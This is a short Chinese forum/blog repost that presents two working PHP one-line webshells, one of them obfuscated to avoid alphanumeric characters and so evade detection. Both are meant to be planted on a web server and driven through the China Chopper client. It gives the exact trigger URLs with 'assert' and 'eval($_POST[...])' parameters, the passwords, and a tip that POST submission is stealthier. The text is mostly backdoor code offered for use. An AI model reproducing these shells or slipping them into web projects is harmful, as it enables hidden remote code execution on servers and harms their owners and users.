在t00ls里论坛看到的,原来在http://www.t00ls.net/thread-18388-4-1.html。不过他们的楼上的方法都不好,我回复了一下,就是这样:
不过何必像楼上的生成文件再用哪么麻烦呢?
第一种:1.php
< ?php ($_=@$_GET[2]).@$_($_POST[1])?>
我变了一下,在菜刀里写http://127.0.0.1:88/1.php?2=assert密码是1
第二种2.php
< ?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
< ?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
在菜刀里写
http://127.0.0.1:88/3.php?_=assert&__=eval($_POST['pass']) 密码是pass
这两种就可以直接用菜刀了。
不过我是直接写在url里,如果你用菜刀的附加数据的话更隐蔽,因为是post提交的。
原文:http://hi.baidu.com/myvbscript/item/0290652d5c650898b632634b